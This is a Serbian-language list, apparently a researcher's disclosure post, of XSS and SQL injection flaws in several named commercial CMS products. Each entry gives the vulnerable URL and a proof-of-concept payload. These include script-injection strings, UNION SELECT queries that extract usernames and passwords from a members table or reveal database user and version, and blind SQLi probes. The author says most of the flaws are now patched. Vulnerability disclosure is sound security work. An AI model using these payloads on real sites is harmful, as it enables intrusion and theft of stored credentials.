Lista sigurnosnih propusta koje sam otkrio
Lista za sada sadrži XSS i SQLi sigurnosne propuste komercijalnih web aplikacija.
BGS CMS XSS:
Softver: BGS CMS
Web Sajt: www.bgs-cms.com
Ranjiva adresa: https://www.server/?action=search&search=[XSS]
PoC(Proof of Concept):
https://www.server/?action=search&search=<script>alert(String.fromCharCode(88,+83,+83));</script>
Anantasoft Gazelle CMS XSS:
Softver: Anantasoft Gazelle CMS
Web Sajt: https://www.anantasoft.com
Ranjiva adresa: https://www.server/search.php?lookup=[XSS]
PoC(Proof of Concept):
https://www.server/search.php?lookup=<script>alert(String.fromCharCode(88, 83, 83));</script>
Corvus CMS XSS:
Softver: Corvus CMS
Web Sajt: https://www.corvuscms.hr/cms-rjesenja-24.aspx
Ranjiva adresa: https://server/Content/Search.aspx?q=[XSS]
PoC(Proof of Concept):
https://www.server/Content/Search.aspx?q=<script>alert(String.fromCharCode(88, 83, 83));</script>
Spectrum Software WebManager CMS XSS:
Softver: Spectrum Software WebManager CMS XSS
Web Sajt: https://www.spectrum.hr/proizvodi/web_manager_-_cms/default.aspx
Ranjiva adresa: https://www.server/Search_1.aspx?pojam=[XSS]
PoC(Proof of Concept):
https://www.server/Search_1.aspx?pojam=<script>alert(String.fromCharCode(88,83, 83));</script>
Vito CMS SQL Injection:
Softver: Vito CMS SQL Injection
Web Sajt: https://kameleon-lab.com/vito-cms.php
Ranjiva adresa: https://server/duga_vest.php?id=1[SQLi]
PoC(Proof of Concept):
https://server/duga_vest.php?id=-217+UNION+SELECT+1,2,3,group_concat
(id,0x3a,username,0x3a,password,0x3a),5,6,7,8+from+members–
LINK CMS SQL Injection:
Softver: LINK CMS SQL Injection
Web Sajt: https://www.link-softsolutions.com/SoftLink-Content-Management-System—CMS_20_1
Ranjiva adresa: https://server/navigacija.php?jezik=lat&IDMeniGlavni=6
&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=63[SQLi]
PoC(Proof of Concept):
https://server/navigacija.php?jezik=lat&IDMeniGlavni=6&
IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=-63+UNION+SELECT+1,
CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4–
Clicker CMS Blind SQL Injection:
Softver: Clicker CMS Blind SQL Injection
Web Sajt: n/a
Ranjiva adresa: https://server/index.php?lang=4[BSQLi]
PoC(Proof of Concept):
https://server/index.php?lang=4 and substring(@@version,1,1)=5– (tačno ili netačno)
https://server/index.php?lang=4 and substring(@@version,1,1)=4– (netačno ili tačno)
Deo je objavnjen na sajtovima koji se bave skupljanjem i verifikacijom nađenih sigurnosnih propusta exploit-db.com, packetstormsecurity.org i secunia.com .
Danas je većina ovih softvera “zakrpljenja”.